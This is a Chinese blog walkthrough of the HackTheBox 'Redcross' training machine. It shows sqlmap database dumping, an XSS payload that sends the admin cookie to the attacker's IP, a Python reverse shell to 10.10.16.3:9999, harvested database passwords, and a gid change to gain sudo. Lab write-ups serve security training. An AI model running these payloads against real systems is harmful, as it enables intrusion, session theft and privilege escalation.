hackthebox-Tracks-CREST_CRT-Redcross

最新推荐文章于 2023-02-21 21:58:27 发布
最新推荐文章于 2023-02-21 21:58:27 发布
阅读量332 收藏 1
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/129012374
版权

弱口令 guest::guest登录

burp抓包,userid值存在sql注入

将包保存至文件

sqlmap测试

sqlmap -l 1.txt --batch

sqlmap -l 1.txt --batch -dbs

sqlmap -l 1.txt --batch --tables -D "redcross"

sqlmap -l 1.txt --batch --columns -D "redcross" -T "messages"

sqlmap -l 1.txt --batch --dump -C "body,dest,id,origin,subject" -D "redcross" -T "messages"

admin subd webapp prob

猜测存在一个 admin子域名

sqlmap -l 1.txt --batch --columns -D "requests" -T "messages"

sqlmap -l 1.txt --batch --columns -D "users" -T "messages"

将 admin.redcross.htb 添入host文件

访问 admin.redcross.htb

需要账号密码

在 https://intra.redcross.htb/?page=contact 页面发现留言板

会向后台提交数据,可能存在XSS,

1.测试Request提交

2.测试Details提交

3.测试contact phone or email 提交

contact phone or email 提交内容中确认存在XSS,

编写script脚本

<script>new Image().src='http://10.10.16.3:8877/'+document.cookie</script>

并在本地监听回连,可以拿到管理员cookie。

获得管理员cookie

PHPSESSID=kbesmh8hcdkh8hjuc3smbibmo5

在 admin.redcross.htb 登录页面任意输入账号密码并抓包

放包

以管理员身份进入后台

点击防火墙

将自己IP添加进白名单

在用户管理页面

可以添加用户

test111 : ezD5cdrc

尝试SSH连接

 

存在一个 penelope用户

在防火墙管理页面,在deny按钮发包处

先添加一个ip

在deny按钮处

 

使用命令反弹shell

添加ip

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.3",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

升级shell

script /dev/null -c bash

查看文件 actions.php

users.php

host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&

host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&

host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw

../init.php

#database configuration

$dbhost='127.0.0.1';

$dbuser='dbcross';

$dbpass='LOSPxnme4f5pH5wp';

$dbname='redcross';

尝试登录数据库

psql -h 127.0.0.1 -U unixusrmgr unix

select * from passwd_table;

发现创建的用户test111在表内

尝试update gid=0

update passwd_table set gid=0 where username='test111';

ssh登录查看

ssh test111@10.129.217.230

ezD5cdrc

查看所在组

不在sudo组中

查看sudo组

cat /etc/group | grep sudo

gid为27

数据库中设置 test111的gid为27

update passwd_table set gid=27 where username='test111';

ssh重新登录查看

ssh test111@10.129.217.230

ezD5cdrc

获取user falg

ddfa5f5ac640aa395d84690f5ef1cc24

获取root flag

dc8ad516b2f70e37deb36becc851b5c5

参考

https://www.jianshu.com/p/1db2c88a91c5

:)--+
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
No.144-HackTheBox-Linux-RedCross-Walkthrough渗透学习
qq_34801745的博客
06-23 359
** HackTheBox-Linux-RedCross-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/162 靶机难度:中级(5.0/10) 靶机发布日期:2019年4月11日 靶机描述: RedCross is a medium difficulty box that features XSS, OS commanding, SQL injection, remote exploitation of a vulne
【Apollo7.0】感知模块(3):激光雷达感知中的目标跟踪算法--lidar_obstacle_tracking---multi_target_tracker
yangda_9527的博客
04-17 1639
apollo7.0, 激光雷达感知中的目标跟踪算法。
如何为目标识别追踪项目mikel-brostrom/yolov8_tracking增加计数功能?
专注“目标检测”领域技术分享
02-21 4414
代码的网址项目名:Real-time multi-object tracking and segmentation using Yolov8(1)它的识别和分割是YOLO8完成的。它的多目标追踪是由后面四种算法实现的(botsort,bytetrack,ocsort,strongsort)(2)它这个是实时的Real-time,识别、跟踪、分割的速度很快。
ROS Navigation-----costmap_2d简介
倔强不倒翁的博客
11-30 8611
costmap_2d简介
Human-Falling-Detect-Tracks:AlphaPose + ST-GCN + SORT
04-14
人体跌倒检测与追踪使用Tiny-YOLO oneclass检测帧中的每个人,并使用获取骨骼姿势,然后使用模型从每个人跟踪的每30帧中预测动作。 现在支持7种动作:站立,行走,坐着,躺下,站起来,坐下,跌倒。...
easyeda-round-tracks:EasyEDA的弯曲轨道和泪珠
05-04
easyeda-round-tracks 基于此扩展将舍入应用于EasyEDA中PCB上的铜走线。安装下载/克隆此存储库在浏览器或桌面中打开 在EasyEDA中,转到“高级”>“扩展名”>“扩展名设置...”>“加载扩展名...”>“选择文件...”。 ...
spotify-top-tracks
05-21
Spotify-Top-tracks 基于: : 适用于iOS 14的小部件,显示了过去四周内您收听次数最多的曲目。 安装 Spotify先决条件 1.)转到并创建一个新的应用程序2.)点击“编辑设置”,然后添加作为重定向URI。 3.)在编辑...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学生创业计划书(4)三篇文件.docx
07-11
大学生创业计划书(4)三篇文件.docx
家具设计作品PPT模板
07-11
【作品名称】:家具设计作品PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
议题:如何提升基础数据与参数设定---二组.xlsx
07-11
议题:如何提升基础数据与参数设定---二组
电子保险丝保护芯片,全球前8强生产商排名及市场份额调研数据.pdf
07-11
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。 邮箱:market@qyresearch.com
20XX年工作总结PPT模板
07-11
【作品名称】:20XX年工作总结PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
201X工作汇报总结欧美杂志风PPT模板
07-11
【作品名称】:201X工作汇报总结欧美杂志风PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
uni-app,一个使用Vue.js开发所有前端应用的框架
最新发布
07-11
uni-app是一个使用Vue.js开发所有前端应用的框架。以下是对uni-app的详细解析: 一、简介 uni-app是DCloud(数字天堂)推出的一款跨平台开发框架,它允许开发者编写一套代码,然后发布到iOS、Android、H5、以及各种小程序(微信/支付宝/百度/头条/QQ/钉钉/淘宝)等多个平台。这一特点极大地提高了开发效率和代码的重用率。此外,uni-app还提供了丰富的原生API和插件来实现更多功能。 二、开发工具 官方推荐使用HBuilderX来开发uni-app类型的项目,因为HBuilderX提供了模板丰富、完善的智能提示、一键运行等便利功能。当然,开发者也可以根据自己的喜好选择其他编辑器,如VS Code、Sublime等。 三、项目目录和文件作用 pages.json:用于对uni-app进行全局配置,决定页面文件的路径、窗口样式、原生的导航栏、底部的原生tabbar等。 manifest.json:应用的配置文件,用于指定应用的名称、图标、权限等。 App.vue:根组件,所有页面都是在App.vue下进行切换,是页面入口文件,可以调用应用的生命周期函
2024年东南亚干冰机市场深度研究及预测报告.pdf
07-11
东南亚位于我国倡导推进的“一带一路”海陆交汇地带,作为当今全球发展最为迅速的地区之一,近年来区域内生产总值实现了显著且稳定的增长。根据东盟主要经济体公布的最新数据,印度尼西亚2023年国内生产总值(GDP)增长5.05%;越南2023年经济增长5.05%;马来西亚2023年经济增速为3.7%;泰国2023年经济增长1.9%;新加坡2023年经济增长1.1%;柬埔寨2023年经济增速预计为5.6%。 东盟国家在“一带一路”沿线国家中的总体GDP经济规模、贸易总额与国外直接投资均为最大,因此有着举足轻重的地位和作用。当前,东盟与中国已互相成为双方最大的交易伙伴。中国-东盟贸易总额已从2013年的443亿元增长至 2023年合计超逾6.4万亿元,占中国外贸总值的15.4%。在过去20余年中,东盟国家不断在全球多变的格局里面临挑战并寻求机遇。2023东盟国家主要经济体受到国内消费、国外投资、货币政策、旅游业复苏、和大宗商品出口价企稳等方面的提振,经济显现出稳步增长态势和强韧性的潜能。 本调研报告旨在深度挖掘东南亚市场的增长潜力与发展机会,分析东南亚市场竞争态势、销售模式、客户偏好、整体市场营商环境,为国内企业出海开展业务提供客观参考意见。 本文核心内容: 市场空间:全球行业市场空间、东南亚市场发展空间。 竞争态势:全球份额,东南亚市场企业份额。 销售模式:东南亚市场销售模式、本地代理商 客户情况:东南亚本地客户及偏好分析 营商环境:东南亚营商环境分析 本文纳入的企业包括国外及印尼本土企业,以及相关上下游企业等,部分名单 QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。邮箱:market@qyresearch.com
通过echarts根据hangzhou-tracks.json绘制地图
05-14
然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <meta charset="utf-8"> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值